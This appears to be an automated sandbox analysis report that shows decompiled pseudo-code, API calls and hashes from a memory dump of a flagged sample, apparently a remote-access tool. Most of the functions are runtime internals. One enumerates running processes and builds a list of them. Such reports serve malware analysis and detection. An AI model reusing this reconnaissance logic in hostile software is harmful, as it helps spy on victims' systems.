                    0x00000000
                    0x00444ab1
                    0x00444ab5
                    0x00444ade
                    0x00444ade
                    0x00444ae0
                    0x00444ab7
                    0x00444ab7
                    0x00444abb
                    0x00444abf
                    0x00444ac6
                    0x00444acc
                    0x00000000
                    0x00444ace
                    0x00444ace
                    0x00444ad1
                    0x00444ad4
                    0x00444adc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00444adc
                    0x00444acc
                    0x00444aeb
                    0x00444aeb
                    0x00444aed
                    0x00444b1b
                    0x00444b1b
                    0x00000000
                    0x00444aef
                    0x00444aef
                    0x00444af5
                    0x00444af6
                    0x00444af7
                    0x00444af8
                    0x00444afd
                    0x00444b03
                    0x00444b06
                    0x00444b08
                    0x00444b0f
                    0x00444b11
                    0x00444b13
                    0x00444b0a
                    0x00444b0a
                    0x00444b0b
                    0x00000000
                    0x00444b0b
                    0x00444b08
                    0x00000000
                    0x00444aed
                    0x00444ae4
                    0x00444ae6
                    0x00444ae9
                    0x00444ae9
                    0x00000000
                    0x00444ae9
                    0x00444b22
                    0x00444b22
                    0x00444b23
                    0x00444b26
                    0x00444b2c
                    0x00444b2c
                    0x00444b35
                    0x00444b37
                    0x00000000
                    0x00444b39
                    0x00444b39
                    0x00000000
                    0x00444b39
                    0x00444b37
                    0x00000000
                    0x004448fe
                    0x004448fe
                    0x00444903
                    0x00000000
                    0x00444909
                    0x00444909
                    0x0044490e
                    0x00000000
                    0x00444914
                    0x00444914
                    0x0044491a
                    0x0044491f
                    0x00444921
                    0x00444928
                    0x00444929
                    0x0044492b
                    0x00000000
                    0x00000000
                    0x00444931
                    0x00444931
                    0x00444935
                    0x0044493b
                    0x00000000
                    0x00444941
                    0x00444943
                    0x00444944
                    0x00444947
                    0x00000000
                    0x0044494d
                    0x0044494d
                    0x00444953
                    0x00444958
                    0x00444962
                    0x00444966
                    0x0044496b
                    0x0044496e
                    0x00444970
                    0x00000000
                    0x00444972
                    0x00444972
                    0x00444974
                    0x00444977
                    0x00444977
                    0x0044497a
                    0x0044497d
                    0x0044497d
                    0x00444988
                    0x0044498a
                    0x0044498c
                    0x00000000
                    0x00000000
                    0x0044498c
                    0x00000000
                    0x0044498e
                    0x0044498e
                    0x00444994
                    0x00444997
                    0x00444997
                    0x004449a5
                    0x004449ae
                    0x004449b3
                    0x004449b9
                    0x004449bc
                    0x004449bd
                    0x004449bf
                    0x004449cd
                    0x004449cd
                    0x004449d4
                    0x00444a35
                    0x00000000
                    0x004449d6
                    0x004449d6
                    0x004449e4
                    0x004449e9
                    0x004449ec
                    0x004449ee
                    0x00444b5e
                    0x00444b60
                    0x00444b61
                    0x00444b62
                    0x00444b63
                    0x00444b64
                    0x00444b65
                    0x00444b6a
                    0x00444b6d
                    0x00444b6e
                    0x00444b76
                    0x00444b7d
                    0x00444b80
                    0x00444b81
                    0x00444b84
                    0x00444b88
                    0x00444b89
                    0x00444b8c
                    0x00444b9c
                    0x00444ba8
                    0x00444bbf
                    0x00444bc4
                    0x00444bc7
                    0x00444bc9
                    0x00444bde
                    0x00444be1
                    0x00444be1
                    0x00444be4
                    0x00444bea
                    0x00444bf3
                    0x00444bf5
                    0x00444bf8
                    0x00444bff
                    0x00444c02
                    0x00444c08
                    0x00000000
                    0x00000000
                    0x00444c0a
                    0x00444c0e
                    0x00444c37
                    0x00444c37
                    0x00444c10
                    0x00444c10
                    0x00444c14
                    0x00444c18
                    0x00444c1f
                    0x00444c25
                    0x00000000
                    0x00444c27
                    0x00444c27
                    0x00444c2a
                    0x00444c2d
                    0x00444c35
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00444c35
                    0x00444c25
                    0x00444c44
                    0x00444c44
                    0x00444c46
                    0x00444c4c
                    0x00444c52
                    0x00444c55
                    0x00444c55
                    0x00444c58
                    0x00444c5b
                    0x00444c5b
                    0x00444c6b
                    0x00444c79
                    0x00444c7e
                    0x00444c85
                    0x00444c87
                    0x00000000
                    0x00444c8d
                    0x00444c93
                    0x00444c99
                    0x00444ca0
                    0x00444ca6
                    0x00444ca9
                    0x00444caf
                    0x00444cbc
                    0x00444cc3
                    0x00444cc8
                    0x00444ccb
                    0x00444ccd
                    0x00444f26
                    0x00444f2c
                    0x00444f2d
                    0x00444f2e
                    0x00444f2f
                    0x00444f30
                    0x00444f31
                    0x00444f36
                    0x00444f37
                    0x00444f3c
                    0x00444cd3
                    0x00444cd3
                    0x00444ce1
                    0x00444ce4
                    0x00444cff
                    0x00444d06
                    0x00444d0c
                    0x00444d12
                    0x00444ce6
                    0x00444ce6
                    0x00444cee
                    0x00000000
                    0x00444cf0
                    0x00444cf0
                    0x00444cf6
                    0x00444cf6
                    0x00444cee
                    0x00444d19
                    0x00444d1c
                    0x00444e39
                    0x00444e3c
                    0x00444e49
                    0x00444e4c
                    0x00444e54
                    0x00444e54
                    0x00444e3e
                    0x00444e44
                    0x00444e44
                    0x00444d22
                    0x00444d22
                    0x00444d28
                    0x00444d30
                    0x00444d32
                    0x00444d35
                    0x00444d3e
                    0x00444d47
                    0x00444d4d
                    0x00444d4d
                    0x00444d50
                    0x00444d52
                    0x00000000
                    0x00000000
                    0x00444d54
                    0x00444d5a
                    0x00444d5b
                    0x00444d66
                    0x00444d6e
                    0x00444d76
                    0x00444d79
                    0x00444d7c
                    0x00444d82
                    0x00444d88
                    0x00444d8e
                    0x00444d94
                    0x00444d97
                    0x00000000
                    0x00000000
                    0x00444d99
                    0x00444dbe
                    0x00444dbe
                    0x00444dc1
                    0x00444dc5
                    0x00444dde
                    0x00444de3
                    0x00444de6
                    0x00444de8
                    0x00444dee
                    0x00444e29
                    0x00444df0
                    0x00444df0
                    0x00444df5
                    0x00444dfd
                    0x00444dfe
                    0x00444dfe
                    0x00444e15
                    0x00444e1c
                    0x00444e1f
                    0x00444e24
                    0x00444e24
                    0x00444e2c
                    0x00444e2f
                    0x00444e2f
                    0x00444e34
                    0x00000000
                    0x00444e34
                    0x00444d9b
                    0x00444d9d
                    0x00444da2
                    0x00444da8
                    0x00444db1
                    0x00444dba
                    0x00444dba
                    0x00000000
                    0x00444d9d
                    0x00444e57
                    0x00444e57
                    0x00444e5b
                    0x00444e63
                    0x00444e69
                    0x00444e6c
                    0x00444e72
                    0x00444e74
                    0x00444eb4
                    0x00444eba
                    0x00444ec1
                    0x00444ec1
                    0x00444ec7
                    0x00444ecb
                    0x00000000
                    0x00444ecd
                    0x00444ecd
                    0x00444ed1
                    0x00444ed6
                    0x00444eda
                    0x00444edf
                    0x00444ee6
                    0x00444ef4
                    0x00444efa
                    0x00444efd
                    0x00444efd
                    0x00444ecb
                    0x00444f0c
                    0x00444f14
                    0x00444f1d
                    0x00444e76
                    0x00444e7c
                    0x00444e7f
                    0x00444e86
                    0x00444e98
                    0x00444e9f
                    0x00444eac
                    0x00000000
                    0x00444eac
                    0x00000000
                    0x00444e74
                    0x00444ccd
                    0x00444c48
                    0x00000000
                    0x00444c48
                    0x00000000
                    0x00444c46
                    0x00444c3f
                    0x00444c41
                    0x00444c41
                    0x00000000
                    0x00444bcb
                    0x00444bcb
                    0x00444bcb
                    0x00444bcd
                    0x00444bd2
                    0x00444bdd
                    0x00444bdd
                    0x004449f4
                    0x004449f4
                    0x004449f7
                    0x004449fc
                    0x00444b59
                    0x00000000
                    0x00444a02
                    0x00444a04
                    0x00444a0c
                    0x00444a12
                    0x00444a13
                    0x00444a19
                    0x00444a1a
                    0x00444a1f
                    0x00444a22
                    0x00444a24
                    0x00444a2a
                    0x00444a2c
                    0x00444a2d
                    0x00444a2d
                    0x00444a3b
                    0x00444a3b
                    0x00444a3e
                    0x00444a40
                    0x00444a43
                    0x00444a51
                    0x00444a51
                    0x00444b3b
                    0x00444b3b
                    0x00000000
                    0x00444b3d
                    0x00444b3d
                    0x00000000
                    0x00444a45
                    0x00444a45
                    0x00444a48
                    0x00444a4b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00444a4b
                    0x00444a43
                    0x004449fc
                    0x004449ee
                    0x004449c1
                    0x004449c3
                    0x004449c4
                    0x004449c7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004449c7
                    0x004449bf
                    0x00444947
                    0x00000000
                    0x0044493b
                    0x00000000
                    0x00444a58
                    0x0044490e
                    0x00444903
                    0x004448f8
                    0x004448b1
                    0x004448b1
                    0x004448b3
                    0x004448b5
                    0x004448b6
                    0x004448b7
                    0x004448b8
                    0x004448bd
                    0x00444b48
                    0x00444b4d
                    0x00444b58
                    0x00444b58
                    0x004448af
                    0x00000000

                    APIs
                      • Part of subcall function 00445B29: RtlAllocateHeap.NTDLL(00000000,00434CD9,?,?,00438257,?,?,pth_unenc,?,?,0040DC6B,00434CD9,?,?,?,?), ref: 00445B5B
                    • _free.LIBCMT ref: 004447F8
                    • _free.LIBCMT ref: 0044480F
                    • _free.LIBCMT ref: 0044482E
                    • _free.LIBCMT ref: 00444849
                    • _free.LIBCMT ref: 00444860
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$AllocateHeap
                    • String ID:
                    • API String ID: 3033488037-0
                    • Opcode ID: cc07e01ed151387b42929f53e5e556d1c13e67e641478ccbbd2bfd8f641a4627
                    • Instruction ID: d16d2cce8ff46d63faf977538d730edf3ef40db1102be722175e0831557a159a
                    • Opcode Fuzzy Hash: cc07e01ed151387b42929f53e5e556d1c13e67e641478ccbbd2bfd8f641a4627
                    • Instruction Fuzzy Hash: E451F371A00304AFEB21EF6AC841B6AB7F4EF89725F14056FE809D7251E739E901CB48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E0040F706(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                    				char _v540;
                    				char _v568;
                    				void* _v572;
                    				void* _v584;
                    				char _v604;
                    				void* _v608;
                    				char _v628;
                    				void* _v632;
                    				char _v652;
                    				void* _v656;
                    				char _v676;
                    				void* _v680;
                    				char _v700;
                    				void* _v704;
                    				char _v724;
                    				void* _v728;
                    				char _v748;
                    				void* _v752;
                    				char _v772;
                    				void* _v776;
                    				char _v796;
                    				void* _v800;
                    				char _v820;
                    				void* _v824;
                    				char _v844;
                    				void* _v848;
                    				char _v868;
                    				void* _v872;
                    				char _v892;
                    				void* _v896;
                    				char _v912;
                    				char _v916;
                    				void* _v920;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				int _t45;
                    				void* _t50;
                    				void* _t51;
                    				void* _t53;
                    				void* _t133;
                    				void* _t134;
                    
                    				_t120 = __edx;
                    				_t81 = __ecx;
                    				_t80 = __ebx;
                    				_t133 = __ecx;
                    				E004020DF(__ebx, __ecx);
                    				 *0x473af4 = E0041BA4C(_t81);
                    				_t134 = CreateToolhelp32Snapshot(2, 0);
                    				if(_t134 != 0) {
                    					_v568 = 0x22c;
                    					_push( &_v568);
                    					Process32FirstW(_t134);
                    					_t45 = Process32NextW(_t134,  &_v572);
                    					_t138 = _t45;
                    					if(_t45 != 0) {
                    						do {
                    							E0040417E(__ebx,  &_v912, _t120, 0x4664a8,  &_v540);
                    							_t50 = E0041B623(_t80,  &_v604, E0041BA7A(_v572) & 0x000000ff);
                    							_t51 = E0041B623(_t80,  &_v628, _v572);
                    							_t53 = E0041B7B3(_t80,  &_v676, E0041BC72( &_v652, _v572));
                    							_t120 = E00402EA1( &_v868, E00406383(_t80,  &_v844, E00402EA1( &_v820, E00406383(_t80,  &_v796, E00402EA1( &_v772, E00406383(_t80,  &_v748, E00406362(_t80,  &_v724, _t133, 0x4664a8, _t138, E0041B7B3(_t80,  &_v700,  &_v916)), _t133, 0x4664a8, _t138, 0x4664a8), _t53), _t133, 0x4664a8, _t138, 0x4664a8), _t51), _t133, 0x4664a8, _t138, 0x4664a8), _t50);
                    							E00401FE2(_t133, _t61, _t134, E00406383(_t80,  &_v892, _t61, _t133, 0x4664a8, _t138, "|"));
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401F09();
                    							E00401FD8();
                    							E00401FD8();
                    							E00401F09();
                    						} while (Process32NextW(_t134,  &_v584) != 0);
                    					}
                    					CloseHandle(_t134);
                    				}
                    				return _t133;
                    			}













































                    0x0040f706
                    0x0040f706
                    0x0040f706
                    0x0040f70f
                    0x0040f711
                    0x0040f71f
                    0x0040f72a
                    0x0040f72e
                    0x0040f73b
                    0x0040f746
                    0x0040f748
                    0x0040f757
                    0x0040f75d
                    0x0040f75f
                    0x0040f76a
                    0x0040f776
                    0x0040f796
                    0x0040f7ab
                    0x0040f7ce
                    0x0040f849
                    0x0040f858
                    0x0040f861
                    0x0040f86a
                    0x0040f873
                    0x0040f87c
                    0x0040f888
                    0x0040f894
                    0x0040f8a0
                    0x0040f8ac
                    0x0040f8b8
                    0x0040f8c4
                    0x0040f8d0
                    0x0040f8dc
                    0x0040f8e8
                    0x0040f8f1
                    0x0040f905
                    0x0040f76a
                    0x0040f90e
                    0x0040f90e
                    0x0040f91f

                    APIs
                      • Part of subcall function 0041BA4C: GetCurrentProcess.KERNEL32(?,?,?,0040D8B3,WinDir,00000000,00000000), ref: 0041BA5D
                      • Part of subcall function 0041BA4C: IsWow64Process.KERNEL32(00000000,?,?,0040D8B3,WinDir,00000000,00000000), ref: 0041BA64
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F724
                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F748
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F757
                    • CloseHandle.KERNEL32(00000000), ref: 0040F90E
                      • Part of subcall function 0041BA7A: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F402,00000000,?,?,00474320), ref: 0041BA8F
                      • Part of subcall function 0041BA7A: IsWow64Process.KERNEL32(00000000,?,?,?,00474320), ref: 0041BA9A
                      • Part of subcall function 0041BC72: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041BC8A
                      • Part of subcall function 0041BC72: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041BC9D
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F8FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                    • String ID:
                    • API String ID: 2180151492-0
                    • Opcode ID: 7436d766f5678e88e3999aee08c4335b1cc52c32d91ffe68d1bb8de41b034042
                    • Instruction ID: 04ab1c1d190405bd51fa8c5d559a5ef95f3307f94c40d5bfa71a2ea17a9db7e5
                    • Opcode Fuzzy Hash: 7436d766f5678e88e3999aee08c4335b1cc52c32d91ffe68d1bb8de41b034042
                    • Instruction Fuzzy Hash: F84104311083415BC325FB22DC51BEFB3A5AF94345F50493EF48A961E2EF385A4AC79A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E0044380A(signed int* __ecx, signed int __edx) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				signed int _v16;
                    				signed int _t28;
                    				signed int _t29;
                    				intOrPtr _t33;
                    				signed int _t37;
                    				signed int _t38;
                    				signed int _t40;
                    				void* _t50;
                    				signed int _t56;
                    				intOrPtr* _t57;
                    				signed int _t68;
                    				signed int _t71;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t80;
                    				signed int* _t81;
                    				signed int _t85;
                    				void* _t86;
                    
                    				_t72 = __edx;
                    				_v12 = __ecx;
                    				_t28 =  *__ecx;
                    				_t81 =  *_t28;
                    				if(_t81 != 0) {
                    					_t29 =  *0x47000c; // 0xc3a97826
                    					_t56 =  *_t81 ^ _t29;
                    					_t78 = _t81[1] ^ _t29;
                    					_t83 = _t81[2] ^ _t29;
                    					asm("ror edi, cl");
                    					asm("ror esi, cl");
                    					asm("ror ebx, cl");
                    					if(_t78 != _t83) {
                    						L14:
                    						 *_t78 = E00447EA0( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                    						_t33 = E00433D8C(_t56);
                    						_t57 = _v12;
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                    						_t24 = _t78 + 4; // 0x4
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00433D8C(_t24);
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00433D8C(_t83);
                    						_t37 = 0;
                    						L15:
                    						return _t37;
                    					}
                    					_t38 = 0x200;
                    					_t85 = _t83 - _t56 >> 2;
                    					if(_t85 <= 0x200) {
                    						_t38 = _t85;
                    					}
                    					_t80 = _t38 + _t85;
                    					if(_t80 == 0) {
                    						_t80 = 0x20;
                    					}
                    					if(_t80 < _t85) {
                    						L9:
                    						_push(4);
                    						_t80 = _t85 + 4;
                    						_push(_t80);
                    						_v8 = E0044F4E5(_t56);
                    						_t40 = E00446172(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							goto L11;
                    						}
                    						_t37 = _t40 | 0xffffffff;
                    						goto L15;
                    					} else {
                    						_push(4);
                    						_push(_t80);
                    						_v8 = E0044F4E5(_t56);
                    						E00446172(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							L11:
                    							_t56 = _t68;
                    							_v8 = _t68 + _t85 * 4;
                    							_t83 = _t68 + _t80 * 4;
                    							_t78 = _v8;
                    							_push(0x20);
                    							asm("ror eax, cl");
                    							_t71 = _t78;
                    							_v16 = 0 ^  *0x47000c;
                    							asm("sbb edx, edx");
                    							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                    							_v8 = _t74;
                    							if(_t74 == 0) {
                    								goto L14;
                    							}
                    							_t75 = _v16;
                    							_t50 = 0;
                    							do {
                    								_t50 = _t50 + 1;
                    								 *_t71 = _t75;
                    								_t71 = _t71 + 4;
                    							} while (_t50 != _v8);
                    							goto L14;
                    						}
                    						goto L9;
                    					}
                    				}
                    				return _t28 | 0xffffffff;
                    			}

























                    0x0044380a
                    0x00443814
                    0x00443818
                    0x0044381a
                    0x0044381e
                    0x00443828
                    0x00443839
                    0x0044383e
                    0x00443840
                    0x00443842
                    0x00443844
                    0x00443846
                    0x0044384a
                    0x00443904
                    0x00443912
                    0x00443914
                    0x00443919
                    0x00443920
                    0x00443922
                    0x00443930
                    0x0044393f
                    0x00443942
                    0x00443944
                    0x00000000
                    0x00443945
                    0x00443852
                    0x00443857
                    0x0044385c
                    0x0044385e
                    0x0044385e
                    0x00443860
                    0x00443865
                    0x00443869
                    0x00443869
                    0x0044386c
                    0x0044388b
                    0x0044388b
                    0x0044388d
                    0x00443890
                    0x00443899
                    0x0044389c
                    0x004438a1
                    0x004438a4
                    0x004438a9
                    0x00000000
                    0x00000000
                    0x004438ab
                    0x00000000
                    0x0044386e
                    0x0044386e
                    0x00443870
                    0x00443879
                    0x0044387c
                    0x00443881
                    0x00443884
                    0x00443889
                    0x004438b3
                    0x004438b6
                    0x004438b8
                    0x004438bb
                    0x004438c3
                    0x004438c9
                    0x004438d0
                    0x004438d2
                    0x004438da
                    0x004438e9
                    0x004438ed
                    0x004438ef
                    0x004438f2
                    0x00000000
                    0x00000000
                    0x004438f4
                    0x004438f7
                    0x004438f9
                    0x004438f9
                    0x004438fa
                    0x004438fc
                    0x004438ff
                    0x00000000
                    0x004438f9
                    0x00000000
                    0x00443889
                    0x0044386c
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: d2a3e813007ae33c7f4ea32d7870425da20d85f3624e6e02af7e34f6206f4947
                    • Instruction ID: 3951246862caad5ea33db52478312a14fbff6ae8fe5aaa890c311c3f89632257
                    • Opcode Fuzzy Hash: d2a3e813007ae33c7f4ea32d7870425da20d85f3624e6e02af7e34f6206f4947
                    • Instruction Fuzzy Hash: 0941D372A002049FEB14DF79C881A6EB7F1EF89714F1545AEE515EB341D734AE01CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E00450B3C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                    				signed int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* _v40;
                    				signed int _t34;
                    				signed int _t40;
                    				int _t46;
                    				int _t53;
                    				void* _t55;
                    				int _t57;
                    				signed int _t63;
                    				int _t67;
                    				short* _t69;
                    				signed int _t70;
                    				short* _t71;
                    
                    				_t34 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t34 ^ _t70;
                    				E0043A1C7(__ebx,  &_v28, __edx, _a4);
                    				_t57 = _a24;
                    				if(_t57 == 0) {
                    					_t53 =  *(_v24 + 8);
                    					_t57 = _t53;
                    					_a24 = _t53;
                    				}
                    				_t67 = 0;
                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                    				_v12 = _t40;
                    				if(_t40 == 0) {
                    					L15:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return E004349BB(_v8 ^ _t70);
                    				}
                    				_t55 = _t40 + _t40;
                    				asm("sbb eax, eax");
                    				if((_t55 + 0x00000008 & _t40) == 0) {
                    					_t69 = 0;
                    					L11:
                    					if(_t69 != 0) {
                    						E004368A0(_t67, _t69, _t67, _t55);
                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                    						if(_t46 != 0) {
                    							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                    						}
                    					}
                    					L14:
                    					E0043585D(_t69);
                    					goto L15;
                    				}
                    				asm("sbb eax, eax");
                    				_t48 = _t40 & _t55 + 0x00000008;
                    				_t63 = _t55 + 8;
                    				if((_t40 & _t55 + 0x00000008) > 0x400) {
                    					asm("sbb eax, eax");
                    					_t69 = E00445B29(_t63, _t48 & _t63);
                    					if(_t69 == 0) {
                    						goto L14;
                    					}
                    					 *_t69 = 0xdddd;
                    					L9:
                    					_t69 =  &(_t69[4]);
                    					goto L11;
                    				}
                    				asm("sbb eax, eax");
                    				E00456BA0();
                    				_t69 = _t71;
                    				if(_t69 == 0) {
                    					goto L14;
                    				}
                    				 *_t69 = 0xcccc;
                    				goto L9;
                    			}




















                    0x00450b44
                    0x00450b4b
                    0x00450b57
                    0x00450b5c
                    0x00450b61
                    0x00450b66
                    0x00450b69
                    0x00450b6b
                    0x00450b6b
                    0x00450b70
                    0x00450b89
                    0x00450b8f
                    0x00450b94
                    0x00450c33
                    0x00450c37
                    0x00450c3c
                    0x00450c3c
                    0x00450c58
                    0x00450c58
                    0x00450b9a
                    0x00450ba2
                    0x00450ba6
                    0x00450bf2
                    0x00450bf4
                    0x00450bf6
                    0x00450bfb
                    0x00450c12
                    0x00450c1a
                    0x00450c2a
                    0x00450c2a
                    0x00450c1a
                    0x00450c2c
                    0x00450c2d
                    0x00000000
                    0x00450c32
                    0x00450bad
                    0x00450baf
                    0x00450bb1
                    0x00450bb9
                    0x00450bd6
                    0x00450be0
                    0x00450be5
                    0x00000000
                    0x00000000
                    0x00450be7
                    0x00450bed
                    0x00450bed
                    0x00000000
                    0x00450bed
                    0x00450bbd
                    0x00450bc1
                    0x00450bc6
                    0x00450bca
                    0x00000000
                    0x00000000
                    0x00450bcc
                    0x00000000

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043F2A3,?,00000000,?,00000001,?,?,00000001,0043F2A3,?), ref: 00450B89
                    • __alloca_probe_16.LIBCMT ref: 00450BC1
                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00450C12
                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0043A894,?), ref: 00450C24
                    • __freea.LIBCMT ref: 00450C2D
                      • Part of subcall function 00445B29: RtlAllocateHeap.NTDLL(00000000,00434CD9,?,?,00438257,?,?,pth_unenc,?,?,0040DC6B,00434CD9,?,?,?,?), ref: 00445B5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 313313983-0
                    • Opcode ID: da44f06c859d2388aa558513b8c44509f45f6d2c23ef2a04710a5346cf500de3
                    • Instruction ID: 27a9c7e55e8bcfcb852f1bfd7ae681584769cbfb68ed0e186fd403fe7bdac993
                    • Opcode Fuzzy Hash: da44f06c859d2388aa558513b8c44509f45f6d2c23ef2a04710a5346cf500de3
                    • Instruction Fuzzy Hash: 99311032A0020AABDF299F65DC80EAF7BA5EF00315F04022AFC04D7252EB39DC55CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E0044ED6A() {
                    				int _v8;
                    				void* __ecx;
                    				void* _t6;
                    				int _t7;
                    				char* _t13;
                    				int _t17;
                    				void* _t19;
                    				char* _t25;
                    				WCHAR* _t27;
                    
                    				_t27 = GetEnvironmentStringsW();
                    				if(_t27 == 0) {
                    					L7:
                    					_t13 = 0;
                    				} else {
                    					_t6 = E0044ED33(_t27);
                    					_pop(_t19);
                    					_t17 = _t6 - _t27 >> 1;
                    					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                    					_v8 = _t7;
                    					if(_t7 == 0) {
                    						goto L7;
                    					} else {
                    						_t25 = E00445B29(_t19, _t7);
                    						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                    							_t13 = 0;
                    						} else {
                    							_t13 = _t25;
                    							_t25 = 0;
                    						}
                    						E00446172(_t25);
                    					}
                    				}
                    				if(_t27 != 0) {
                    					FreeEnvironmentStringsW(_t27);
                    				}
                    				return _t13;
                    			}












                    0x0044ed79
                    0x0044ed7f
                    0x0044edd7
                    0x0044edd7
                    0x0044ed81
                    0x0044ed82
                    0x0044ed87
                    0x0044ed90
                    0x0044ed96
                    0x0044ed9c
                    0x0044eda1
                    0x00000000
                    0x0044eda3
                    0x0044eda9
                    0x0044edae
                    0x0044edcc
                    0x0044edc6
                    0x0044edc6
                    0x0044edc8
                    0x0044edc8
                    0x0044edcf
                    0x0044edd4
                    0x0044eda1
                    0x0044eddb
                    0x0044edde
                    0x0044edde
                    0x0044edec

                    APIs
                    • GetEnvironmentStringsW.KERNEL32 ref: 0044ED73
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044ED96
                      • Part of subcall function 00445B29: RtlAllocateHeap.NTDLL(00000000,00434CD9,?,?,00438257,?,?,pth_unenc,?,?,0040DC6B,00434CD9,?,?,?,?), ref: 00445B5B
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044EDBC
                    • _free.LIBCMT ref: 0044EDCF
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044EDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                    • String ID:
